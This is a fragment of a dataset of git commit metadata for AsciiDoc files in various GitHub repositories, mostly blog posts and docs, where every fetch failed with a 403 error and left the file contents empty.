2016-05-02-Notes-For-Setting-Up-Rails-Testing.adoc","repos":"caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io","old_file":"_posts\/2016-05-02-Notes-For-Setting-Up-Rails-Testing.adoc","new_file":"_posts\/2016-05-02-Notes-For-Setting-Up-Rails-Testing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/caryfitzhugh\/caryfitzhugh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f082542375ef125b4a663b03bf5165f89e8cad2","subject":"y2b create post Google Chromecast Unboxing, First Look \\u0026 Test!","message":"y2b create post Google Chromecast Unboxing, First Look \\u0026 Test!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-07-25-Google-Chromecast-Unboxing-First-Look-u0026-Test.adoc","new_file":"_posts\/2013-07-25-Google-Chromecast-Unboxing-First-Look-u0026-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68e3bffe7be1e86ba6ceceec10863d7df72e77cd","subject":"Update 2017-01-28-Markov.adoc","message":"Update 2017-01-28-Markov.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-01-28-Markov.adoc","new_file":"_posts\/2017-01-28-Markov.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2cd111bf054f7e98cf4d34514214e488107385f3","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/11\/11\/deref.adoc","new_file":"content\/news\/2022\/11\/11\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"0527a4a5e312d1a7de3af106f60f4f50b2bd8b1b","subject":"Updated windows env set-up doc","message":"Updated windows env set-up doc","repos":"oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,oskopek\/carcv","old_file":"docs\/howto-setup-environment-windows.adoc","new_file":"docs\/howto-setup-environment-windows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sk413025\/carcv.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4468d1184f4d01332ad1d91ca64b9bcd4a2bfaa4","subject":"Update 2015-11-11-Episode-30-U-Interested-in-a-New-U-I.adoc","message":"Update 2015-11-11-Episode-30-U-Interested-in-a-New-U-I.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-11-11-Episode-30-U-Interested-in-a-New-U-I.adoc","new_file":"_posts\/2015-11-11-Episode-30-U-Interested-in-a-New-U-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"963cbbe0f240683edab785950720aa8ebac3e043","subject":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","message":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","repos":"jfavlam\/Concepts,jfavlam\/Concepts,jfavlam\/Concepts","old_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfavlam\/Concepts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff8f60008585526f04d95e7568219d3e05a0884e","subject":"Update 2016-04-01-BREAKING-Disney-to-offer-Third-Shift-Magic-Hours.adoc","message":"Update 2016-04-01-BREAKING-Disney-to-offer-Third-Shift-Magic-Hours.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-04-01-BREAKING-Disney-to-offer-Third-Shift-Magic-Hours.adoc","new_file":"_posts\/2016-04-01-BREAKING-Disney-to-offer-Third-Shift-Magic-Hours.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c3376d1edb176496591e9a4e9260cc513fbd15e","subject":"Add a README to document how to generate the docs.wildfly.org web site.","message":"Add a README to document how to generate the docs.wildfly.org web site.\n","repos":"jstourac\/wildfly,tadamski\/wildfly,tadamski\/wildfly,rhusar\/wildfly,wildfly\/wildfly,xasx\/wildfly,rhusar\/wildfly,tadamski\/wildfly,wildfly\/wildfly,rhusar\/wildfly,wildfly\/wildfly,pferraro\/wildfly,jstourac\/wildfly,rhusar\/wildfly,iweiss\/wildfly,wildfly\/wildfly,pferraro\/wildfly,xasx\/wildfly,iweiss\/wildfly,jstourac\/wildfly,pferraro\/wildfly,jstourac\/wildfly,pferraro\/wildfly,iweiss\/wildfly,iweiss\/wildfly,xasx\/wildfly","old_file":"docs\/README.adoc","new_file":"docs\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wildfly\/wildfly.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"a77e73ef859126d4c01a03ee924806bf1df6ee50","subject":"Fix objectfilter link","message":"Fix objectfilter link","repos":"destijl\/artifacts,destijl\/artifacts,pidydx\/artifacts,pidydx\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pidydx\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"85c0a96e182ed03d1ae4effcdba128797107e6ae","subject":"Create powered-by.adoc","message":"Create powered-by.adoc","repos":"incodehq\/contactapp,incodehq\/contactapp,incodehq\/contactapp,incodehq\/contactapp","old_file":"powered-by.adoc","new_file":"powered-by.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/incodehq\/contactapp.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ff2d57cc3694fab6c41217490b8ee46f780ffbe6","subject":"y2b create post Casio G-Shock G7900A-4 Red Unboxing \\u0026 Overview + Size Comparaison \\u0026 Close Ups!","message":"y2b create post Casio G-Shock G7900A-4 Red Unboxing \\u0026 Overview + Size Comparaison \\u0026 Close Ups!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-15-Casio-GShock-G7900A4-Red-Unboxing-u0026-Overview--Size-Comparaison-u0026-Close-Ups.adoc","new_file":"_posts\/2011-01-15-Casio-GShock-G7900A4-Red-Unboxing-u0026-Overview--Size-Comparaison-u0026-Close-Ups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"775d5efeec1d55f3500567a0820f68733caa07ce","subject":"Added documentation on trouble-shooting tips","message":"Added documentation on trouble-shooting tips\n\nfixes #784\n","repos":"maksimu\/springfox,erikthered\/springfox,acourtneybrown\/springfox,namkee\/springfox,springfox\/springfox,arshadalisoomro\/springfox,acourtneybrown\/springfox,vmarusic\/springfox,RobWin\/springfox,cbornet\/springfox,zorosteven\/springfox,wjc133\/springfox,thomsonreuters\/springfox,springfox\/springfox,thomsonreuters\/springfox,jlstrater\/springfox,arshadalisoomro\/springfox,zhiqinghuang\/springfox,RobWin\/springfox,vmarusic\/springfox,yelhouti\/springfox,arshadalisoomro\/springfox,erikthered\/springfox,acourtneybrown\/springfox,cbornet\/springfox,thomsonreuters\/springfox,jlstrater\/springfox,springfox\/springfox,maksimu\/springfox,zhiqinghuang\/springfox,springfox\/springfox,zhiqinghuang\/springfox,kevinconaway\/springfox,yelhouti\/springfox,vmarusic\/springfox,zorosteven\/springfox,erikthered\/springfox,namkee\/springfox,wjc133\/springfox,yelhouti\/springfox,kevinconaway\/springfox,maksimu\/springfox,RobWin\/springfox,zorosteven\/springfox,wjc133\/springfox,jlstrater\/springfox,cbornet\/springfox,kevinconaway\/springfox,namkee\/springfox","old_file":"asciidoc\/common-problems.adoc","new_file":"asciidoc\/common-problems.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/springfox\/springfox.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9bbc0dccf98e812b25c7e5b13de471af2afeb515","subject":"Update 2002-02-02-NCMPCPP-on-OpenSUSE.adoc","message":"Update 2002-02-02-NCMPCPP-on-OpenSUSE.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2002-02-02-NCMPCPP-on-OpenSUSE.adoc","new_file":"_posts\/2002-02-02-NCMPCPP-on-OpenSUSE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"24a695bef64b7a64744e1e6d1555c56f80621318","subject":"Update 2016-5-13-Engineer-Career-Path.adoc","message":"Update 2016-5-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-5-13-Engineer-Career-Path.adoc","new_file":"_posts\/2016-5-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62f4792c0e48af7927c87de320b1268f5dc2163e","subject":"Update 2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","message":"Update 2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","new_file":"_posts\/2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"279ec393fc52f223dc8ff92dab2b2b09eedc50de","subject":"Update 2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","message":"Update 2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","new_file":"_posts\/2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0dd03ac83a15ab3568220005e807d839b0be5834","subject":"y2b create post Ultimate Back To School Gadget Guide! (2013)","message":"y2b create post Ultimate Back To School Gadget Guide! (2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-08-22-Ultimate-Back-To-School-Gadget-Guide-2013.adoc","new_file":"_posts\/2013-08-22-Ultimate-Back-To-School-Gadget-Guide-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e61c728751d02539f7a6497952121379406b72ec","subject":"y2b create post The Best Keyboard Ever? (Das 4 Professional)","message":"y2b create post The Best Keyboard Ever? (Das 4 Professional)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-12-29-The-Best-Keyboard-Ever-Das-4-Professional.adoc","new_file":"_posts\/2014-12-29-The-Best-Keyboard-Ever-Das-4-Professional.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d15c83cff390f31ad0fe8feb655dcc35f5f8d7ec","subject":"Update 2015-01-31-Ruckblick-auf-den-5-Linux-Informationstag.adoc","message":"Update 2015-01-31-Ruckblick-auf-den-5-Linux-Informationstag.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2015-01-31-Ruckblick-auf-den-5-Linux-Informationstag.adoc","new_file":"_posts\/2015-01-31-Ruckblick-auf-den-5-Linux-Informationstag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aeeecea95c8a2f1ef561c349d8c5f408fd05b5ac","subject":"Update 2016-01-23-XML-Prague-2016.adoc","message":"Update 2016-01-23-XML-Prague-2016.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d30822e1e6245e19d501563483de0fb3ba382763","subject":"Update 2016-02-04-Hallo-from-Tekk.adoc","message":"Update 2016-02-04-Hallo-from-Tekk.adoc","repos":"Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io","old_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mentaxification\/Mentaxification.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bfda1ccfc0596d827d50d7c1b97da3c6f117b145","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e1caaa3a7fdb17e2dcb7426bfb32790c7bbf342","subject":"Update 2016-07-31-References-and-Values-and-Bears-Oh-My.adoc","message":"Update 2016-07-31-References-and-Values-and-Bears-Oh-My.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-07-31-References-and-Values-and-Bears-Oh-My.adoc","new_file":"_posts\/2016-07-31-References-and-Values-and-Bears-Oh-My.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d14d57cbe1f50fe8c7531159d8fc969e34f75b63","subject":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","message":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f2b68c8c1bfa1c3e9c9c18a7c517f410680820a","subject":"Update 2015-02-09-Test.adoc","message":"Update 2015-02-09-Test.adoc","repos":"ludolphus\/hubpress.io,ludolphus\/hubpress.io,ludolphus\/hubpress.io","old_file":"_posts\/2015-02-09-Test.adoc","new_file":"_posts\/2015-02-09-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ludolphus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ef5d5aaf52546f7f5ec73c59af3b0c86274d88a","subject":"Update 03_task_exportDrawIo.adoc","message":"Update 03_task_exportDrawIo.adoc","repos":"docToolchain\/docToolchain,jakubjab\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain","old_file":"src\/docs\/manual\/03_task_exportDrawIo.adoc","new_file":"src\/docs\/manual\/03_task_exportDrawIo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b64f49bdd9ff420f7c6975d2d8d3d343d9c2467b","subject":"y2b create post Black Ops 2 Care Package GIVEAWAY!","message":"y2b create post Black Ops 2 Care Package GIVEAWAY!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-11-13-Black-Ops-2-Care-Package-GIVEAWAY.adoc","new_file":"_posts\/2012-11-13-Black-Ops-2-Care-Package-GIVEAWAY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5204fcd884592d68e175c7e5bbb13759b80f5806","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e919766c38d209a6b23467e4582e4d6713715662","subject":"y2b create post You Wish You Got THIS For Christmas...","message":"y2b create post You Wish You Got THIS For Christmas...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-25-You%20Wish%20You%20Got%20THIS%20For%20Christmas....adoc","new_file":"_posts\/2017-12-25-You%20Wish%20You%20Got%20THIS%20For%20Christmas....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"987aa9eda57bfa8988961da1ca5216ce9b74e7dd","subject":"Update 2014-04-25-Nouveau-site-pour-la-fondation-Eclipse.adoc","message":"Update 2014-04-25-Nouveau-site-pour-la-fondation-Eclipse.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2014-04-25-Nouveau-site-pour-la-fondation-Eclipse.adoc","new_file":"_posts\/2014-04-25-Nouveau-site-pour-la-fondation-Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59dc4130fcd71d4c5d1c9a9962ed1b1171391d44","subject":"JPA: documentation #150, #57","message":"JPA: documentation #150, #57\n","repos":"werval\/werval,werval\/werval,werval\/werval,werval\/werval","old_file":"org.qiweb.modules\/org.qiweb.modules.jpa\/src\/doc\/index.adoc","new_file":"org.qiweb.modules\/org.qiweb.modules.jpa\/src\/doc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/werval\/werval.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d472edf0280419dff6b3d556c7d34da7e4db11c0","subject":"added regressions","message":"added regressions\n","repos":"aim42\/htmlSanityCheckConsumer","old_file":"src\/docs\/asciidoc\/regressions.adoc","new_file":"src\/docs\/asciidoc\/regressions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aim42\/htmlSanityCheckConsumer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fdc7f4c3eda8bbd82e757d9c8975480d9c88ad91","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"987fbfae68447012d973cef0297be110165be542","subject":"Update 2017-03-22-Workflow-Needs-current-setup-text-processing.adoc","message":"Update 2017-03-22-Workflow-Needs-current-setup-text-processing.adoc","repos":"thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io","old_file":"_posts\/2017-03-22-Workflow-Needs-current-setup-text-processing.adoc","new_file":"_posts\/2017-03-22-Workflow-Needs-current-setup-text-processing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomaszahr\/thomaszahr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad891bd32d71790143725c5e2e4f9e56fd476290","subject":"Update 2017-06-20-How-to-Explain-Masonry-in-30-Seconds-or-Less.adoc","message":"Update 2017-06-20-How-to-Explain-Masonry-in-30-Seconds-or-Less.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-06-20-How-to-Explain-Masonry-in-30-Seconds-or-Less.adoc","new_file":"_posts\/2017-06-20-How-to-Explain-Masonry-in-30-Seconds-or-Less.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16dabc79fcd6192632e94f0dc91cdb325d94ecd1","subject":"Release notes for services-release 0.0.5 (#186)","message":"Release notes for services-release 0.0.5 (#186)\n\n* Release notes for services-release 0.0.5\r\n\r\n* Updates after feedback\r\n","repos":"hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/07\/05\/hawkular-services-0.0.5.Final.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/07\/05\/hawkular-services-0.0.5.Final.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0181ca0b0d8cbf288ef666f607eaa84e88e2790e","subject":"Update 2015-05-19-Eclipse-Mars-episode-1-Vue-hierarchique-des-projets.adoc","message":"Update 2015-05-19-Eclipse-Mars-episode-1-Vue-hierarchique-des-projets.adoc","repos":"jabbytechnologies\/blog,jabbytechnologies\/blog,jabbytechnologies\/blog,jabbytechnologies\/blog","old_file":"_posts\/2015-05-19-Eclipse-Mars-episode-1-Vue-hierarchique-des-projets.adoc","new_file":"_posts\/2015-05-19-Eclipse-Mars-episode-1-Vue-hierarchique-des-projets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabbytechnologies\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60e805550574facb902dfebf3a4f38197a9a2bb0","subject":"Update 2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","message":"Update 2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","new_file":"_posts\/2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"739aa1096fa4408a00b5610ecd4ebd96ffc69218","subject":"fix copy paste error in doc (#167)","message":"fix copy paste error in doc (#167)\n\n","repos":"resilience4j\/resilience4j,drmaas\/resilience4j,RobWin\/circuitbreaker-java8,mehtabsinghmann\/resilience4j,resilience4j\/resilience4j,drmaas\/resilience4j,RobWin\/javaslang-circuitbreaker,javaslang\/javaslang-circuitbreaker","old_file":"resilience4j-documentation\/src\/docs\/asciidoc\/addon_guides\/dropwizard.adoc","new_file":"resilience4j-documentation\/src\/docs\/asciidoc\/addon_guides\/dropwizard.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ab751ee1802b001c1650202b5afe41e6af64ff50","subject":"Better format","message":"Better format\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"4a24c81147327b5953c79adb2bfa21cf5c969da0","subject":"SEC-2299: Document @AuthenticationPrincipal","message":"SEC-2299: Document 